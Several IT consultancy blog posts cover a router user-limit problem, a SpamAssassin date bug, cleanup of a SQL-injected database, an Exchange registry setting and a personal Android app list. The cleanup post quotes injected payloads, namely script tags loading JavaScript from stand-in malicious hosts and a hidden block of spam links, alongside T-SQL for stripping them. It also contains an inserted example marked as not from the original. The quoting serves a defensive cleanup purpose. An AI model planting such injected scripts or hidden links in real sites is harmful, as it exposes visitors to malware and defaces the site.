User Licensing Gotchas

Posted by Jeff Knapp

Got a call from a client today who was unable to get his laptop to connect to his wireless network.

The client has a standard Linksys WRT54G which is sitting behind a WatchGuard SOHO router.  (The WatchGuard predated my involvement with the client, and we determined it was easier to use the WRT54G as an access point rather than ripping out the WatchGuard...)

Upon inspection, the laptop WAS connecting to the wireless network, it just didn't have internet access.  Vista would show it had Internet connectivity, but it would then just go away.

Upgraded the WRT54G's firmware, same result.  Changed from WEP to WPA-2. Same result.

Reviewed the logs on the WatchGuard and saw "User count exceeded. Packet dropped."

A-HA!

The WatchGuard, unlike most consumer routers, has a user limit to it.  It keeps track of 10 IPs and when IP number 11 hits the routing table, it gets whacked with a big ole' DENY rule.

When I plugged the laptop into the WRT54G via ethernet cable, the IP address was one of the 10 in the routing table and packets were allowed to flow.  The IP address assigned to the wireless interface was not in the table and therefore blocked.

We couldn't figure out why the laptop stopped working.  The client mentioned the laptop stopped working when we put a new computer on the floor.  We did a quick count of all devices on the network and only came up with 7...

Just as I was leaving, one of the warehouse guys came in holding his iPhone asking "Did something happen to the wireless network?"

Of course, something had -- I hadn't changed the Linksys back to WEP after the WPA-2 experiment, and he lost his connection... and the mystery of the additional devices was solved.

So, the moral is two-fold -- look for user licensing restrictions where you least expect them, and someone else's handheld device from home sitting on your network might have a negative impact on your ability to get work done.

SpamAssassin has Y2K + 10 Bug

Posted by Jeff Knapp

Just a quick heads up, but SpamAssassin (which we use for filtering here at Jephens) has a mis-formed filtering rule which considers 2010 to be "grossly in the future" and therefore can't be a valid date.

This might have been true in Y2K, but in 2010, we're not so gross.

If you use ESVA like we do, there's a simple enough fix which is outlined in the ESVA Forums.

Otherwise, you'll need to fix your local.cf rules or edit the 72_active.cf file.

Further details can be found at Mike Cardwell's blog: SpamAssassin 2010 bug.

Cleaning Up After a SQL Injection Attack, Part 2

Posted by Jeff Knapp

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., a Chicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)

-- Pass 1: user tables (xtype 'u'), columns of type text (35), nvarchar (231) or varchar (167)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- PRINT only emits each UPDATE statement for review; it does not run it.
-- The string to strip goes between the first pair of quotes in REPLACE (it is empty as shown here).
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

-- Pass 2: ntext columns (99), cast to nvarchar(4000) so REPLACE can work on them.
-- Values longer than 4000 characters are truncated by this cast.
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
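
Branden's suggestion, sketched as an added T-SQL example (this is not the code from the original post, whose continuation is not shown here). It assumes the injected content starts at the first `<script` in a field; the cursor name, variable names and marker value are chosen for illustration.

```sql
-- Added example: emit review-only statements that cut each affected value off
-- at the first '<script' marker. PRINT only produces text; nothing is modified.
DECLARE @T VARCHAR(255), @C VARCHAR(255), @X INT
DECLARE @E VARCHAR(600), @W VARCHAR(1000), @S VARCHAR(4000), @Marker VARCHAR(50)
SET @Marker = '<script'   -- assumption: everything from this tag onward is injected

DECLARE Col_Cursor CURSOR FOR
SELECT a.name, b.name, b.xtype
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u'
  AND b.xtype IN (231, 167, 99)   -- nvarchar, varchar, ntext
OPEN Col_Cursor
FETCH NEXT FROM Col_Cursor INTO @T, @C, @X
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- ntext cannot be passed to LEFT/CHARINDEX, so use an nvarchar(4000) copy as
    -- the script above does. A marker past character 4000 is not matched, so
    -- such rows are left untouched rather than damaged.
    IF @X = 99
        SET @E = 'CAST([' + @C + '] AS NVARCHAR(4000))'
    ELSE
        SET @E = '[' + @C + ']'
    SET @W = ' WHERE ' + @E + ' LIKE ''%' + @Marker + '%'''

    -- 1) Preview: how many rows in this column contain the marker
    SET @S = 'SELECT ''' + @T + '.' + @C + ''' AS col, COUNT(*) AS hits FROM ['
           + @T + ']' + @W
    PRINT @S

    -- 2) Cleanup: keep only the text that precedes the marker
    SET @S = 'LEFT(' + @E + ', CHARINDEX(''' + @Marker + ''', ' + @E + ') - 1)'
    IF @X = 99
        SET @S = 'CAST(' + @S + ' AS NTEXT)'
    SET @S = 'UPDATE [' + @T + '] SET [' + @C + '] = ' + @S + @W
    PRINT @S

    FETCH NEXT FROM Col_Cursor INTO @T, @C, @X
END
CLOSE Col_Cursor
DEALLOCATE Col_Cursor
```

Run the generated SELECT statements first and compare the hit counts with what you expect; any field that legitimately contains a `<script` tag would be cut at that point too, so take a backup before running the UPDATEs.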

Making Exchange Public Folders Store Mail Items as E-Mail

Posted by Jeff Knapp

I keep coming up against this, and I keep forgetting it, so I figured I'd write it down here for all of our benefit.

Exchange 2003 allowed us to easily mail enable public folders, so something sent to info@domain.invalid would go to a public folder where any number of staff could monitor the mailbox.

However, by default, the mail is stored in the Public Folder as a POST and not an E-MAIL (for the geeks in the audience, IPM.POST vs. IPM.NOTE).

To make the public folder store incoming mail as emails, we need to make a quick registry change. This is all outlined in MS KB 817809.

Go to

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MSExchangeIS\<ServerName>\Public-<GUID>

And create (or edit) the value:

Value name: Incoming defaults to IPM.Note
Value type: DWORD
Value data: 1

Setting the value to 1 (true) stores things as IPM.NOTE (which is what we want). Setting the value to 0 sets it back to saving things as a post.

My Droid Apps…

Posted by Jeff Knapp

So, I'm not a gigantic app person -- my iPod Touch has the essentials for what I need, a few cutesy show-off things or games for the kids, so I figured I'd do the same with my Droid... yes and no. Here's a rundown of what's on my Droid right now, and what I think:

Alarmed Light - Used it because it has a feature where you're forced to answer math questions to turn the alarm off. Kinda forces you to shake the cobwebs out and get started.

Aloqa - Cool app that uses your GPS to let you know what's around. It's integrated with Yelp for food ratings. It has icons on its main screen for "Hot" (whatever that means), Yelp Restaurants, Coffee, last.fm, Music (showing me concerts in Denmark?!?), Playing Tonight (movies), Yelp Bars & Clubs, Real Estate, Wikipedia, ATMs, Pizza, Aloqa, Yelp Fast Food and then "Add more channels." It more or less does what it is supposed to; it's nice to look at.

BeamReader - a PDF viewer. I should uninstall since I bought "Documents to Go"

Bubble Burst Lite -- Windows Mobile Jawbreaker for the Droid.

ConnectFour - decent enough implementation. AI seems a little stupid sometimes.

Documents to Go - open Word, Excel, Powerpoint, PDF. Does good job at rendering PDFs.

Flashlight - turns your screen white. Doesn't seem to adjust for maximum brightness. Passable.

Flickr Droid - Droid needs a good Flickr app. This isn't it, but the best one I could find that uses the Flickr API to let me at my stuff, since a lot of my photostream is friends/family only.

FlightStats Lite - haven't had a chance to play with this. Will in January as I head to CES.

Goggles - Google's latest toy. Varies from wildly successful to "how did you not recognize the Pepsi logo?!?"

GPS Status - essentially a digital compass. Used when I was troubleshooting GPS on the phone.

Flixster Movies - quick and easy to get to where we have to go for Friday Morning Movie Club.

NYC Bus and Subway Map - not as interactive as I'd like. Literally a HiDef graphic of the map, and you can click thru to the MTA website for further details on the lines.

OpenTable - online restaurant reservations from opentable.com . Decent.

Pandora - works well over 3G, tho I imagine it eats thru the quota pretty quick.

PicSay Lite - dopey photo editing thing. Makes speech balloons. Don't know why I downloaded this.

Poke a Mole - whack-a-mole for the phone. Fun game with a Giant Downside - even when phone is muted annoying background music plays. Have to go into game menu to mute it.

Remote RDP Demo - eventually I'll need to really use function keys when I Remote Desktop into a machine from my phone, but until then, the demo version does the trick.

Robo Defense FREE - I do enjoy the tower defense genre of casual gaming... so why not have it on my phone? (Hardly ever play it. Seemed like a good idea.)

Shazam - this app still amazes me. Where did they get that song database???

Stopwatch - straightforward.

Sudoku Free - seeing it in my list makes me feel smart until I play it, then I feel dumb.

The Weather Channel - it has a widget so I can glance at the home screen to see what it's going to be like... or rather I can look at the home screen and tell my wife what it's going to be like... (I had a weather widget on the Treo and missed it.)

TivoRemote - control the Tivo over WiFi. Nice, especially for text entry. The iPhone's version is better.

TRAFFIC! - A test app for me. Not in love.

Trap! - Another game, but its "draw a line" technology gets in the way of gameplay. Fun when it does what you want.

Tunes Remote - Control iTunes from the Droid. YAY! One of the big reasons I got the iPhone touch was to control the iTunes machine hooked to the outdoor speakers.

Twidroid Pro - From what I understand, the best Twitter client for the Droid. I'm happy with it. Does everything I need, but I am far from a Twitter power user, so some might find it lacking. They constantly update it which seems like they're interested developers.

US Traffic - Another traffic app that I tried before I realized Google Maps had a Traffic layer...

wpToGo - Allows me to post to Wordpress from the phone... tho I have not had the need to do so.

What have I missed?

